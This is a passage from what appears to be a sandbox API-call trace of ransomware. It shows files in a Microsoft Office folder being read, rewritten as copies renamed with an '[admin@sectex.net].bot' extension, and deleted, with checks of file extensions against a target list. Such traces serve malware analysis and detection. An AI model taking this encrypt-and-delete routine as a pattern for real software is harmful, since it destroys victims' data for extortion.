	[0148.491] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xcb0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xcb0, lpOverlapped=0x0) returned 1
	[0148.492] ReadFile (in: hFile=0x31c, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0148.492] WriteFile (in: hFile=0x3d0, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0148.492] SetEndOfFile (hFile=0x3d0) returned 1
	[0148.493] CloseHandle (hObject=0x3d0) returned 1
	[0148.493] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0148.493] SetEndOfFile (hFile=0x31c) returned 1
	[0148.495] CloseHandle (hObject=0x31c) returned 1
	[0148.495] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0148.495] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network3.vrd")) returned 1
	[0148.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD") returned 60
	[0148.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD") returned 60
	[0148.496] lstrlenW (lpString=".doc") returned 4
	[0148.496] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0148.496] lstrlenW (lpString=".docx") returned 5
	[0148.496] lstrcmpiW (lpString1=".docx", lpString2="3.VRD") returned -1
	[0148.496] lstrlenW (lpString=".pdf") returned 4
	[0148.496] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0148.496] lstrlenW (lpString=".xls") returned 4
	[0148.496] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0148.496] lstrlenW (lpString=".xlsx") returned 5
	[0148.496] lstrcmpiW (lpString1=".xlsx", lpString2="3.VRD") returned -1
	[0148.496] lstrlenW (lpString=".ppt") returned 4
	[0148.496] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0148.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD") returned 60
	[0148.496] lstrlenW (lpString=".zip") returned 4
	[0148.496] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0148.496] lstrlenW (lpString=".rar") returned 4
	[0148.496] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0148.496] lstrlenW (lpString=".bz2") returned 4
	[0148.496] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0148.496] lstrlenW (lpString=".7z") returned 3
	[0148.496] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0148.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD") returned 60
	[0148.496] lstrlenW (lpString=".dbf") returned 4
	[0148.496] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0148.496] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD") returned 60
	[0148.496] lstrlenW (lpString=".1cd") returned 4
	[0148.496] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0148.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD") returned 60
	[0148.497] lstrlenW (lpString=".jpg") returned 4
	[0148.497] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0148.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD") returned 60
	[0148.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD") returned 60
	[0148.497] lstrlenW (lpString=".doc") returned 4
	[0148.497] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0148.497] lstrlenW (lpString=".docx") returned 5
	[0148.497] lstrcmpiW (lpString1=".docx", lpString2="3.VRD") returned -1
	[0148.497] lstrlenW (lpString=".pdf") returned 4
	[0148.497] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0148.497] lstrlenW (lpString=".xls") returned 4
	[0148.497] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0148.497] lstrlenW (lpString=".xlsx") returned 5
	[0148.497] lstrcmpiW (lpString1=".xlsx", lpString2="3.VRD") returned -1
	[0148.497] lstrlenW (lpString=".ppt") returned 4
	[0148.497] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0148.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD") returned 60
	[0148.497] lstrlenW (lpString=".zip") returned 4
	[0148.497] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0148.497] lstrlenW (lpString=".rar") returned 4
	[0148.497] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0148.497] lstrlenW (lpString=".bz2") returned 4
	[0148.497] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0148.497] lstrlenW (lpString=".7z") returned 3
	[0148.497] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0148.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD") returned 60
	[0148.497] lstrlenW (lpString=".dbf") returned 4
	[0148.497] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0148.497] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD") returned 60
	[0148.498] lstrlenW (lpString=".1cd") returned 4
	[0148.498] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0148.498] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK3.VRD") returned 60
	[0148.498] lstrlenW (lpString=".jpg") returned 4
	[0148.498] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0148.498] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0148.498] lstrlenW (lpString="OFFOWCI.DLL") returned 11
	[0148.498] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\offowci.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d4
	[0148.896] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=529280) returned 1
	[0148.896] CloseHandle (hObject=0x3d4) returned 1
	[0148.896] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\offowci.dll")) returned 0x20
	[0149.051] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\offowci.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.158] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\offowci.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0149.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL") returned 59
	[0149.158] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL") returned 59
	[0149.158] lstrlenW (lpString=".doc") returned 4
	[0149.158] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.158] lstrlenW (lpString=".docx") returned 5
	[0149.158] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1
	[0149.158] lstrlenW (lpString=".pdf") returned 4
	[0149.158] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.158] lstrlenW (lpString=".xls") returned 4
	[0149.158] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.158] lstrlenW (lpString=".xlsx") returned 5
	[0149.159] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1
	[0149.159] lstrlenW (lpString=".ppt") returned 4
	[0149.159] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL") returned 59
	[0149.159] lstrlenW (lpString=".zip") returned 4
	[0149.159] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.159] lstrlenW (lpString=".rar") returned 4
	[0149.159] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.159] lstrlenW (lpString=".bz2") returned 4
	[0149.159] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.159] lstrlenW (lpString=".7z") returned 3
	[0149.159] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL") returned 59
	[0149.159] lstrlenW (lpString=".dbf") returned 4
	[0149.159] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL") returned 59
	[0149.159] lstrlenW (lpString=".1cd") returned 4
	[0149.159] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL") returned 59
	[0149.159] lstrlenW (lpString=".jpg") returned 4
	[0149.159] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL") returned 59
	[0149.159] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL") returned 59
	[0149.159] lstrlenW (lpString=".doc") returned 4
	[0149.160] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0149.160] lstrlenW (lpString=".docx") returned 5
	[0149.160] lstrcmpiW (lpString1=".docx", lpString2="I.DLL") returned -1
	[0149.160] lstrlenW (lpString=".pdf") returned 4
	[0149.160] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0149.160] lstrlenW (lpString=".xls") returned 4
	[0149.160] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0149.160] lstrlenW (lpString=".xlsx") returned 5
	[0149.160] lstrcmpiW (lpString1=".xlsx", lpString2="I.DLL") returned -1
	[0149.160] lstrlenW (lpString=".ppt") returned 4
	[0149.160] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0149.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL") returned 59
	[0149.160] lstrlenW (lpString=".zip") returned 4
	[0149.160] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0149.160] lstrlenW (lpString=".rar") returned 4
	[0149.160] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0149.160] lstrlenW (lpString=".bz2") returned 4
	[0149.160] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0149.160] lstrlenW (lpString=".7z") returned 3
	[0149.160] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0149.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL") returned 59
	[0149.160] lstrlenW (lpString=".dbf") returned 4
	[0149.160] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0149.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL") returned 59
	[0149.160] lstrlenW (lpString=".1cd") returned 4
	[0149.160] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0149.160] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\OFFOWCI.DLL") returned 59
	[0149.160] lstrlenW (lpString=".jpg") returned 4
	[0149.160] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0149.161] lstrcmpiW (lpString1=".VRD", lpString2=".bot") returned 1
	[0149.161] lstrlenW (lpString="ORGPOS.VRD") returned 10
	[0149.161] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgpos.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.196] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1098) returned 1
	[0149.196] CloseHandle (hObject=0x3ac) returned 1
	[0149.196] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgpos.vrd")) returned 0x20
	[0149.196] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgpos.vrd.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgpos.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.197] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.197] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.197] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgpos.vrd.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0149.199] GetLastError () returned 0x0
	[0149.199] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x44a, lpOverlapped=0x0) returned 1
	[0149.218] WriteFile (in: hFile=0x3f8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x450, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x450, lpOverlapped=0x0) returned 1
	[0149.219] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.219] WriteFile (in: hFile=0x3f8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0149.219] SetEndOfFile (hFile=0x3f8) returned 1
	[0149.219] CloseHandle (hObject=0x3f8) returned 1
	[0149.219] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.219] SetEndOfFile (hFile=0x3ac) returned 1
	[0149.221] CloseHandle (hObject=0x3ac) returned 1
	[0149.221] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.222] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgpos.vrd")) returned 1
	[0149.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD") returned 58
	[0149.222] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD") returned 58
	[0149.222] lstrlenW (lpString=".doc") returned 4
	[0149.222] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0149.222] lstrlenW (lpString=".docx") returned 5
	[0149.222] lstrcmpiW (lpString1=".docx", lpString2="S.VRD") returned -1
	[0149.222] lstrlenW (lpString=".pdf") returned 4
	[0149.222] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0149.223] lstrlenW (lpString=".xls") returned 4
	[0149.223] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0149.223] lstrlenW (lpString=".xlsx") returned 5
	[0149.223] lstrcmpiW (lpString1=".xlsx", lpString2="S.VRD") returned -1
	[0149.223] lstrlenW (lpString=".ppt") returned 4
	[0149.223] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0149.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD") returned 58
	[0149.223] lstrlenW (lpString=".zip") returned 4
	[0149.223] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0149.223] lstrlenW (lpString=".rar") returned 4
	[0149.223] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0149.223] lstrlenW (lpString=".bz2") returned 4
	[0149.223] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0149.223] lstrlenW (lpString=".7z") returned 3
	[0149.223] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0149.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD") returned 58
	[0149.223] lstrlenW (lpString=".dbf") returned 4
	[0149.223] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0149.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD") returned 58
	[0149.223] lstrlenW (lpString=".1cd") returned 4
	[0149.223] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0149.223] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD") returned 58
	[0149.223] lstrlenW (lpString=".jpg") returned 4
	[0149.223] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0149.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD") returned 58
	[0149.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD") returned 58
	[0149.224] lstrlenW (lpString=".doc") returned 4
	[0149.224] lstrcmpiW (lpString1=".doc", lpString2=".VRD") returned -1
	[0149.224] lstrlenW (lpString=".docx") returned 5
	[0149.224] lstrcmpiW (lpString1=".docx", lpString2="S.VRD") returned -1
	[0149.224] lstrlenW (lpString=".pdf") returned 4
	[0149.224] lstrcmpiW (lpString1=".pdf", lpString2=".VRD") returned -1
	[0149.224] lstrlenW (lpString=".xls") returned 4
	[0149.224] lstrcmpiW (lpString1=".xls", lpString2=".VRD") returned 1
	[0149.224] lstrlenW (lpString=".xlsx") returned 5
	[0149.224] lstrcmpiW (lpString1=".xlsx", lpString2="S.VRD") returned -1
	[0149.224] lstrlenW (lpString=".ppt") returned 4
	[0149.224] lstrcmpiW (lpString1=".ppt", lpString2=".VRD") returned -1
	[0149.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD") returned 58
	[0149.224] lstrlenW (lpString=".zip") returned 4
	[0149.224] lstrcmpiW (lpString1=".zip", lpString2=".VRD") returned 1
	[0149.224] lstrlenW (lpString=".rar") returned 4
	[0149.224] lstrcmpiW (lpString1=".rar", lpString2=".VRD") returned -1
	[0149.224] lstrlenW (lpString=".bz2") returned 4
	[0149.224] lstrcmpiW (lpString1=".bz2", lpString2=".VRD") returned -1
	[0149.224] lstrlenW (lpString=".7z") returned 3
	[0149.224] lstrcmpiW (lpString1=".7z", lpString2="VRD") returned -1
	[0149.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD") returned 58
	[0149.224] lstrlenW (lpString=".dbf") returned 4
	[0149.224] lstrcmpiW (lpString1=".dbf", lpString2=".VRD") returned -1
	[0149.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD") returned 58
	[0149.224] lstrlenW (lpString=".1cd") returned 4
	[0149.224] lstrcmpiW (lpString1=".1cd", lpString2=".VRD") returned -1
	[0149.224] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGPOS.VRD") returned 58
	[0149.224] lstrlenW (lpString=".jpg") returned 4
	[0149.224] lstrcmpiW (lpString1=".jpg", lpString2=".VRD") returned -1
	[0149.225] lstrcmpiW (lpString1=".VSL", lpString2=".bot") returned 1
	[0149.225] lstrlenW (lpString="ORGWIZ.VSL") returned 10
	[0149.225] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgwiz.vsl"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.225] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=66992) returned 1
	[0149.225] CloseHandle (hObject=0x3ac) returned 1
	[0149.225] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgwiz.vsl")) returned 0x20
	[0149.225] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgwiz.vsl.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0149.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgwiz.vsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0149.226] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.226] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.226] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgwiz.vsl.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f8
	[0149.226] GetLastError () returned 0x0
	[0149.226] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x105b0, lpOverlapped=0x0) returned 1
	[0149.256] WriteFile (in: hFile=0x3f8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x105c0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x105c0, lpOverlapped=0x0) returned 1
	[0149.258] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0149.258] WriteFile (in: hFile=0x3f8, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0149.258] SetEndOfFile (hFile=0x3f8) returned 1
	[0149.258] CloseHandle (hObject=0x3f8) returned 1
	[0149.258] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0149.258] SetEndOfFile (hFile=0x3ac) returned 1
	[0149.261] CloseHandle (hObject=0x3ac) returned 1
	[0149.261] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0149.262] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\orgwiz.vsl")) returned 1
	[0149.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL") returned 58
	[0149.262] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL") returned 58
	[0149.262] lstrlenW (lpString=".doc") returned 4
	[0149.262] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0149.262] lstrlenW (lpString=".docx") returned 5
	[0149.262] lstrcmpiW (lpString1=".docx", lpString2="Z.VSL") returned -1
	[0149.262] lstrlenW (lpString=".pdf") returned 4
	[0149.262] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0149.262] lstrlenW (lpString=".xls") returned 4
	[0149.262] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0149.263] lstrlenW (lpString=".xlsx") returned 5
	[0149.263] lstrcmpiW (lpString1=".xlsx", lpString2="Z.VSL") returned -1
	[0149.263] lstrlenW (lpString=".ppt") returned 4
	[0149.263] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0149.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL") returned 58
	[0149.263] lstrlenW (lpString=".zip") returned 4
	[0149.263] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0149.263] lstrlenW (lpString=".rar") returned 4
	[0149.263] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0149.263] lstrlenW (lpString=".bz2") returned 4
	[0149.263] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0149.263] lstrlenW (lpString=".7z") returned 3
	[0149.263] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0149.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL") returned 58
	[0149.263] lstrlenW (lpString=".dbf") returned 4
	[0149.263] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0149.263] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\ORGWIZ.VSL") returned 58
